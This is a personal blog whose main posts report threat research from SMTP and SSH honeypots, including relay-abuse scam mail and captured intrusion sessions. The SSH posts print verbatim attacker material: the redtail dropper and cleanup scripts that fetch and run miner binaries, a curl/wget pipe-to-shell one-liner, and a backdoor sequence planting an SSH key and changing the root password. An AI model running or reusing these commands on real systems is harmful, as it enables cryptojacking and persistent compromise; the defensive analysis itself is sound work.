Darkfoe's Blog (Chuck Findlay)

smtp honeypot - the black hole

2026-05-13 11:59pm

Alongside the SSH honeypot I've been running since early March, I also set up an SMTP honeypot on the same VPS - a fake open mail relay on port 25 that accepts everything and delivers it nowhere. This post covers the 10 weeks of messages that accumulated.
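For context, the core of a black-hole relay is tiny - it greets, says yes to everything, and delivers nothing. A minimal sketch of that reply logic (not my actual honeypot, which also logs full sessions):

```shell
# Black-hole SMTP reply logic (sketch): one canned response per client
# command; message bodies are accepted and delivered nowhere.
smtp_reply() {
  case "$1" in
    HELO*|EHLO*) echo '250 Hello' ;;
    MAIL*|RCPT*) echo '250 OK' ;;               # accept any sender/recipient
    DATA)        echo '354 End data with <CR><LF>.<CR><LF>' ;;
    .)           echo '250 Queued' ;;           # "queued" straight to nowhere
    QUIT)        echo '221 Bye' ;;
    *)           echo '250 OK' ;;
  esac
}

smtp_reply 'MAIL FROM:<spameri@tiscali.it>'     # prints: 250 OK
```

Wrap that in a listener on port 25 and every relay scanner on the internet believes you.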

the indy scanner

The most frequent visitor by far is spameri@tiscali.it, showing up almost every single day:

From: spameri@tiscali.it
Subject: [honeypot IP]
To: spameri@tiscali.it
X-Priority: 3
X-Library: Indy 8.0.25

t_Smtp.LocalIP

The X-Library: Indy 8.0.25 header is the giveaway - Indy is an old networking library for Delphi/Pascal. The body t_Smtp.LocalIP is a Delphi variable name that was never resolved - someone's relay scanner has a bug that's been printing the variable name literally instead of the actual value. It's been doing this every day for ten weeks.
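I don't have the Delphi source, but the failure mode is familiar from any language with string interpolation. The shell equivalent (my analogy, not their code - the IP is made up):

```shell
# Single quotes suppress expansion, so the literal variable name ships in
# the message body instead of the value - same class of bug as t_Smtp.LocalIP.
local_ip="203.0.113.7"                 # hypothetical value
echo 'body: $local_ip'                 # bug: prints the variable name
echo "body: $local_ip"                 # intended: prints the value
```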

Worth noting: back when I ran mail servers I was seeing this exact address hitting them, and that was roughly 15 years ago. Whatever this is, it has been continuously running for a very long time.

the relay verification ecosystem

Once the relay is discovered, multiple independent services start tracking whether it stays up:

The "GOLD" alert showed up four separate times (March 10, April 21, April 24, May 4-5), each time blasting the same seven-or-so recipients:

Subject: VULNERABILITY PROOF: GOLD [redacted]

Vulnerability: GOLD
Target: [redacted]
IP: [honeypot IP]
Verified: 2026-03-10 13:16:55

"GOLD" appears to be their rating for a fully open, no-auth relay. This looks like a relay broker notifying buyers when a new relay comes online.

The marker system from one service sends a base64-encoded data blob to a fixed recipient with a unique random marker per send:

DATA For [honeypot IP]
Date: 22 : 03 : 2026
SMTP: [honeypot IP]:25
HOSTNAME: [honeypot hostname]
🔑 MARKER: 7FWC2ZG78S

Appeared twice then stopped - likely a monitoring service logging relays with timestamped proof-of-delivery.
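I'm not publishing the actual blob, but inspecting one is a one-liner. A round trip with an invented payload, just to show the mechanics:

```shell
# Encode a stand-in payload the way such a service would, then decode it
# the way you'd inspect it. The content here is made up, not the real blob.
blob=$(printf 'SMTP: 203.0.113.7:25' | base64)
echo "$blob"
printf '%s' "$blob" | base64 -d
```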

The PHPMailer autodiscovery tests (System Test <it@[honeypot hostname]>) used PHPMailer 7.0.2 to send to several business addresses - probably automated deliverability-checking tools.

The "server details" dump sent the relay's full connection info to a small set of specific addresses including what looked like a lawyer/barrister inbox and personal accounts:

Mode: NOAUTH
IP: [honeypot IP]
Mailserver: [honeypot hostname]
Port: 25
User: N/A / Pass: N/A / SSL: False

Someone sharing relay credentials with specific people rather than broadcasting them.

the day-of-week tester

One sender uses test@test.com with Indy 9.00.10 and fires to a fixed recipient list with bodies that are just the day of the week, mangled:

COOK / MONDAEE / TUEDAEE / GOD OF SABBATH IS GOOD / SATURDAEE / THURS 444

Later the same sender/library combination starts routing actual scam content. Classic relay warm-up before graduating to payload.

the scam ecosystem

The bulk of the content is advance fee fraud. A few technical patterns:

Two senders used the same federalministryofagriculture@vp.pl From address with different personas - shared infrastructure or the same operator running parallel campaigns.

At least six distinct dying-widow/cancer-patient personas followed the same template: spoofed From on a legitimate-looking domain, Reply-To pointing to a personal Gmail. One sender fired two identical copies to the same list within minutes - no deduplication in the script.

The most persistent campaign ran almost daily from April 23 through today using the same fixed recipient list, alternating between two templates from the same reply-to. Still running when I pulled this data.

spoofing legitimacy

A few senders used real organization addresses as their From: header.

With no authentication on port 25, the From: header is meaningless - these senders are just borrowing visual authority.
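The reason it's meaningless: the From: header is just a line inside the DATA section, completely independent of the envelope sender, and an unauthenticated relay checks neither. This sketch just prints the dialogue a relay abuser would send (all addresses are illustrative):

```shell
# The MAIL FROM envelope and the From: header never have to match - the
# header is free text as far as an open relay is concerned.
printf '%s\r\n' \
  'HELO scanner.example' \
  'MAIL FROM:<throwaway@scanner.example>' \
  'RCPT TO:<victim@example.com>' \
  'DATA' \
  'From: Chief Executive <ceo@legit-org.example>' \
  'Subject: urgent' \
  '' \
  '(scam body here)' \
  '.' \
  'QUIT'
```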

the Standard Bank phishing

One elaborate message (April 10) impersonated Standard Bank of South Africa with full HTML formatting and branding images pulled from Google's image cache. The reply URL chain was a deeply-nested deref-mail.com redirect stack - roughly 20 levels of URL encoding deep - to obscure the final destination from link scanners. A raw IP address was accidentally left in the body text, probably a template error.
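Unwinding a stack like that is mechanical - URL-decode until the string stops changing. A sketch (the triple-encoded example URL is mine, not the actual phishing link; decoding delegates to python3):

```shell
# Repeatedly URL-decode until a fixed point is reached; each pass strips
# one layer of %-encoding.
decode_until_stable() {
  url=$1
  while :; do
    next=$(printf '%s' "$url" | python3 -c \
      'import sys,urllib.parse; sys.stdout.write(urllib.parse.unquote(sys.stdin.read()))')
    [ "$next" = "$url" ] && break
    url=$next
  done
  printf '%s\n' "$url"
}

decode_until_stable 'https%253A%252F%252Fexample.com%252F'   # prints: https://example.com/
```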

the word soup

Two messages from sting@terradevins.cat and sting@sopaic.com sent incoherent word salads with MID: hashes in the subject - spam scrambled to evade content filters. The actual payload was presumably a link or attachment that didn't make it through the honeypot.

what I've learned

On SSH I see people trying to gain access to machines. On SMTP I see what they do with open relays once they have them:

The Indy library shows up across multiple unrelated actors - there are clearly decades-old Delphi codebases still in active use for this.

Still collecting. Will follow up when I have connection log data to cross-reference.

honeypot - ten weeks later

2026-05-13 11:00pm

Ten weeks into running the honeypot and things have gotten more interesting. The previous post covered the redtail cryptominer - this one covers what else showed up, and some evolution of redtail itself.

redtail is still here, and keeps rotating C2

The same automated dropper (I'll call it RedtailBot) has not stopped. It has been hitting the honeypot every few hours since early March, and as of today is still going. The interesting part is watching its C2 server rotate - I'm just calling them C2-A through C2-F:

Period                    C2
March 2 - March 4         C2-A
March 5 - April 4         C2-B
April 5 - April 27        C2-C
April 21 - April 28       C2-D (overlap with C2-C)
April 28 - April 30       C2-E
May 1 - May 13            C2-F

Every session from RedtailBot is the same one-liner:

uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://[C2]/sh || curl -sk https://[C2]/sh) | sh -s ssh

The hex in there decodes to auth_ok - so the bot is echoing a confirmation string back to whatever is listening. Since the honeypot has sh removed/broken, every attempt fails at the pipe stage with -bash: sh: command not found. It just keeps trying anyway.
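For reference, the decode is trivial to reproduce. Here it is using printf's portable octal escapes (0x61 is octal 141, and so on) instead of the bot's bash-specific \x form:

```shell
# The bot's hex escapes re-expressed as octal, so any POSIX printf works:
# \141\165\164\150\137\157\153 = a u t h _ o k, \012 = newline.
printf '\141\165\164\150\137\157\153\012'
# prints: auth_ok
```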

At roughly 3-4 hits per day across 10+ weeks, that's somewhere around 250-300 failed infection attempts from this one bot alone.

the "mdrfckr" backdoor

Starting March 24 and still showing up as late as May 1, a different campaign has been hitting the honeypot with a very manual-feeling sequence. I'll call the operator MdrfckrCrew after the comment in their SSH key:

cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">> .ssh/authorized_keys && chmod -R go= ~/.ssh
echo "root:[randompassword]"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

After establishing the backdoor it does a fairly thorough system survey - CPU model, RAM, disk, number of CPU cores, uptime, w, uname -m. Classic "is this machine worth keeping?" reconnaissance.

The same SSH public key with the comment mdrfckr shows up from three different source IPs spread across three different countries over about six weeks, which suggests this is a coordinated botnet with a shared key that gets dropped onto every new box. The password changes are different each time (e.g. m9Nj0SJj1Qjj, 1WODHU9OOXSH, hg28pZIb3Kbg), probably generated per-session.
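Passwords of that shape (12 mixed-case alphanumerics) are what the standard urandom one-liner produces - an assumption about their tooling, but it matches the pattern exactly:

```shell
# Generate a 12-character alphanumeric password from /dev/urandom, the way
# the observed per-session passwords appear to be made.
gen_pass() { tr -dc 'A-Za-z0-9' </dev/urandom | head -c 12; echo; }

p=$(gen_pass)
echo "${#p}"     # prints: 12
```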

The lockr command (alongside chattr) is worth noting - it's trying multiple anti-immutable-flag tools in case one isn't available. chattr is the standard Linux one but lockr isn't a standard tool - so either it's a custom binary or they're just throwing both at the wall.

the ".sysmonitor" dropper

In early April, several sessions I'll group as SysMonitorCrew ran a fingerprinting sequence and then tried to download something to ~/.sysmonitor from a C2 I'll call SM-C2:

uname -s -v -n -r -m
nproc
uptime -p | awk '...'
awk -F: '/model name|Processor/ {gsub(/^ +/, "", $2); print $2; exit}' /proc/cpuinfo
curl -s https://ipinfo.io/org || wget -qO- https://ipinfo.io/org || ...
nvidia-smi -q | grep "Product Name" ...
nvidia-smi -q | grep "Attached GPUs" ...
curl -sSL http://[SM-C2]/[token] -o ~/.sysmonitor || wget -qO ~/.sysmonitor http://[SM-C2]/[token] || ...
chmod +x ~/.sysmonitor && ~/.sysmonitor && history -c && history -w

A few things stand out here. First, the nvidia-smi calls - this campaign is specifically GPU hunting. It checks both Product Name and Attached GPUs counts, so it's doing a proper survey before deciding what to drop. Second, the ISP lookup via ipinfo.io/org - probably filtering out residential connections or cloud providers it already has coverage on. Third, the history -c && history -w at the end to wipe bash history after running.
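The cpuinfo extraction is worth a closer look, since it handles both the x86 layout (model name) and the ARM one (Processor) in a single pattern. Running their awk against a canned line (the CPU string is made up):

```shell
# The campaign's awk one-liner, fed a sample /proc/cpuinfo line: split on
# ':', strip leading spaces from the value, print the first match and exit.
printf 'model name\t: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz\n' |
  awk -F: '/model name|Processor/ {gsub(/^ +/, "", $2); print $2; exit}'
# prints: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz
```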

The binary URL has a long random-looking token path which is probably just obscurity rather than real security - but it does mean you can't accidentally stumble on it. The honeypot doesn't make outbound connections in real time, but URLs seen in sessions get queued and fetched separately at random intervals post-session - so the binary may already be sitting in storage, just not analyzed yet. Given the GPU focus, GPU-accelerated mining (or possibly a cryptostealer that targets GPU memory) seems the likely payload.

The same SM-C2 shows up across three different sessions from different source IPs on April 3-4, suggesting a coordinated campaign.

the docker/container escape probers

Starting April 17, a persistent source I'll call ContainerProber began hammering the honeypot with the same command over and over:

echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh

This ran for weeks - multiple times per day up through early May. What's interesting about this one is what it's actually checking for. Reading /proc/1/mounts and listing /proc/1/ is a standard container escape detection technique - if you're inside a Docker container, PID 1 won't be systemd and /proc/1/mounts will show overlay filesystems. The curl2 in there is probably a typo or a test binary it's looking for.
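The tell they're after boils down to one line. A sketch of the check, fed a canned mounts entry so it's testable anywhere (a real probe reads /proc/1/mounts directly):

```shell
# If PID 1's root filesystem is an overlay mount, you're almost certainly
# inside a Docker-style container. Reads a mounts-format listing on stdin.
is_container() {
  awk '$2 == "/" && $1 == "overlay" { found=1 } END { exit !found }'
}

if printf 'overlay / overlay rw,relatime 0 0\n' | is_container; then
  echo container
else
  echo host
fi
# prints: container
```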

Starting in May, a cluster of Tor exit nodes started running a similar but slightly different variant:

echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778084668565428669" | sh

The big number at the end changes every session - it looks like a session/tracking ID embedded in the payload. These are almost certainly separate operators from ContainerProber, but the same underlying goal: find containers with misconfigured host mounts or namespace leaks.

My honeypot exposes a fake /proc with limited entries, which is apparently convincing enough that they keep coming back.

the ELF checker

Three separate sessions (I'll call them ELFProbe) hit the honeypot with a very simple probe:

echo 1 && cat /bin/echo

On a real Linux system the output starts with the ELF magic bytes \x7fELF, followed by \x02\x01\x01 (64-bit, little-endian, version 1) - so they're checking the magic bytes to confirm they're actually on a Linux system and not some kind of fake/emulated environment. The honeypot faithfully serves back 1\nELF\x02\x01\x01\x00 and they seem satisfied with that.

One session also did:

echo 1 > /dev/null && cat /bin/echo

This is basically the same thing, but it also checks that /dev/null behaves correctly. Shell capability probing is getting more thorough over time.
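The magic-byte check is easy to reproduce without depending on any particular binary - write the four bytes yourself and dump them the way a prober would read them:

```shell
# \177 is octal for 0x7f; a genuine Linux executable starts with these four
# bytes. A scratch file keeps the demo independent of /bin/echo.
printf '\177ELF' > /tmp/elf_magic_demo
head -c 4 /tmp/elf_magic_demo | od -An -tx1
# prints the hex bytes: 7f 45 4c 46
```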

the thorough fingerprinter

One session I'll call MegaScan ran the most comprehensive single-command fingerprint I've seen so far, all in one shot:

cat /proc/cpuinfo; echo ___SEP___; echo $((1337+1337)); echo ___SEP___; mount; echo ___SEP___; uname -a; echo ___SEP___; ls -la /; echo ___SEP___; whoami; echo ___SEP___; cat /etc/issue; echo ___SEP___; ps -ef; echo ___SEP___; free -m; echo ___SEP___; hostname

The $((1337+1337)) is a shell arithmetic test - if it outputs 2674 the shell is functional, if it outputs the literal string $((1337+1337)) it's a dumb shell or fake environment. The session lasted nearly 19 hours - kept open the whole time, probably waiting for a result that never came back to whoever was watching.
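The ___SEP___ markers make the response trivially machine-parsable on the receiving end - presumably something like this (my reconstruction, with an abbreviated sample response):

```shell
# Pull the arithmetic-test field (the second ___SEP___-delimited chunk)
# out of a MegaScan-style response.
printf 'cpuinfo-blob___SEP___2674___SEP___uname-blob\n' |
  awk -F'___SEP___' '{print $2}'
# prints: 2674
```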

what I've learned

After ten weeks, the pattern is roughly this: the honeypot IP gets picked up by mass scanners within hours, and then sits on multiple different botnet target lists simultaneously.

The infrastructure this thing is sitting on has a hostname that looks like a legitimate mail server - seems to be enough misdirection that at least some automated tools don't immediately filter it out.

Still watching. Will post again if anything interesting evolves.

Finally began deploying my homemade honeypot (an emulated SSH server), and I'm starting to get some interesting results, such as the below:

{
    "ip":"[redacted]",
    "rdns":"",
    "user":"root",
    "password":"[redacted - not important anyway]",
    "session_id":"e062ee72-efdc-41f1-ab8d-f8638b85ad03",
    "timestamp":{
        "session_start":"2026-03-02T04:09:24.410659709Z",
        "session_end":"2026-03-02T04:09:24.842450321Z"},
        "commands":[
            {
                "timestamp":"2026-03-02T04:09:24.751221551Z",
                "command":"uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"; (wget --no-check-certificate -qO- https://[redacted]/sh || curl -sk https://[redacted]/sh) | sh -s ssh"
            }
        ]
}

So breaking down the /sh part - it seems to run a cleanup script and then download a binary based on the architecture, doing a few checks along the way (see below).

#!/bin/bash

get_random_string() {
  len=$(expr $(od -An -N2 -i /dev/urandom 2>/dev/null | tr -d ' ') % 32 + 4 2>/dev/null)

  if command -v openssl >/dev/null 2>&1; then
    str=$(openssl rand -base64 256 2>/dev/null | tr -dc 'A-Za-z0-9' | head -c "$len")
    if [ -n "$str" ]; then
      echo "$str"
      return 0
    fi
  fi

  if [ -r /dev/urandom ]; then
    str=$(tr -dc 'A-Za-z0-9' </dev/urandom 2>/dev/null | head -c "$len")
    if [ -n "$str" ]; then
      echo "$str"
      return 0
    fi
  fi

  if [ -n "$RANDOM" ]; then
    echo "$RANDOM"
    return 0
  fi

  # If all else fails
  echo "redtail"
  return 1
}

dlr() {
  rm -rf $1
  wget --no-check-certificate -q https://[redacted]/$1 || curl -skO https://[redacted]/$1
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true
FILENAME=".$(get_random_string)"

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
rm -rf $FILENAME

if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 $FILENAME
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 $FILENAME
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 $FILENAME
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 $FILENAME
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >$FILENAME
    chmod +x $FILENAME
    ./$FILENAME $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x $FILENAME
  ./$FILENAME $1 >/dev/null 2>&1
fi

And for its cleanup script it wants to run:

#!/bin/bash

clean_crontab() {
  chattr -ia "$1"
  grep -vE 'wget|curl|/dev/tcp|/tmp|\.sh|nc|bash -i|sh -i|base64 -d' "$1" >/tmp/clean_crontab
  mv /tmp/clean_crontab "$1"
}

systemctl disable c3pool_miner
systemctl stop c3pool_miner

chattr -ia /var/spool/cron/crontabs
for user_cron in /var/spool/cron/crontabs/*; do
  [ -f "$user_cron" ] && clean_crontab "$user_cron"
done

for system_cron in /etc/crontab /etc/crontabs; do
  [ -f "$system_cron" ] && clean_crontab "$system_cron"
done

for dir in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly /etc/cron.d; do
  chattr -ia "$dir"
  for system_cron in "$dir"/*; do
    [ -f "$system_cron" ] && clean_crontab "$system_cron"
  done
done

clean_crontab /etc/anacrontab

for i in /tmp /var/tmp /dev/shm; do
  rm -rf $i/*
done

After some analysis of the binaries I discovered nothing unexpected - in this case an XMR cryptominer with the unique name "redtail" inside it, supporting multiple architectures. Likely hitting any IoT device or VPS it can grab. Completely automated: roughly half-hour intervals between user/password attempts until it gets in, then roughly 8-12 hour reinfection attempts.

Unfortunately, I was unable to get its configuration, so I could not recover a wallet address or command-and-control server. The server hosting the binaries seems to be just a staging server, nothing special, so no leads there.

Will continue monitoring it for now to see if I find anything else. Eventually I'll build an analysis "pipeline" to see if I can watch it evolve as it keeps retrying to reinfect.

Termux + DeX + code-server + Claude

2026-02-22 1:30pm EST

So for anyone else trying to find a way to make Samsung DeX work as a dev PC - Termux with code-server works for obvious reasons (install extensions in the terminal - extensions don't install well in the UI), and use Claude Code for the AI.

Copilot doesn't work, and Continue.dev doesn't work either. Have yet to try Codex, but Claude Code works wonderfully out of the gate.

Took a break and played Delver

2024-01-16 9:30pm ADT

Went on a little break to play video games, and today it was Delver. So far I have:

(Not only blogging on technical stuff - tossing the odd other thing onto here. This is the closest to social media I'll use.)

Good experience, will play again at some point to try to get to some sort of conclusion.